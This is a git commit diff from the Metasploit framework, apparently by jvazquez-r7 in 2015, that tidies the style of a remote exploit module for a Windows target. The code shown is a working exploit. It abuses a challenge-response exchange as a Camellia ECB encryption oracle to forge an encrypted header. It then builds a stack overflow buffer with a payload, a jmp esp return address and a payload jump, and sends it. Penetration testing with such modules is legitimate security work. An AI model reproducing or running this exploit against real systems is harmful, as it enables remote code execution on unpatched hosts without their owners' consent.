Clean exploit method

bug/bundler_fix
jvazquez-r7 2015-09-16 16:14:21 -05:00
parent d6a637bd15
commit 88fdc9f123
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 8 additions and 9 deletions


@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'StackAdjustment' => -4000,
'Space' => 10000,
'BadChars' => "",
'Space' => 10000
},
'Platform' => 'win',
'Targets' =>
@ -151,29 +150,29 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Performing handshake...")
# plaintext header
plaintextHeader = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
plaintext_header = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# crafted challenge (first 32 bytes is our plaintext header), abuse challenge-response as encryption oracle
challenge = plaintextHeader + ("\x00" * (256 - 32))
challenge = plaintext_header + ("\x00" * (256 - 32))
sock.put(challenge)
# response = encrypt(challenge, key)
response = sock.get_once
# since encryption is done using Camellia in ECB mode, we can cut and paste the first 32 bytes (our header inside the crafted challenge) without knowing the key
encryptedHeader = response[0, 32]
encrypted_header = response[0, 32]
# Don't change the nulls, or it might not work
xploit = ''
xploit << encryptedHeader
xploit << encrypted_header
xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
xploit << payload.encoded
xploit << "\x00" * (target['Offset'] - xploit.length)
xploit << [target.ret].pack("V") # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << [target.ret].pack('V') # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack('V') # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
# The disconnection triggers the exploit
print_status("Sending exploit...")
print_status('Sending exploit...')
sock.put(xploit)
select(nil,nil,nil,5)
disconnect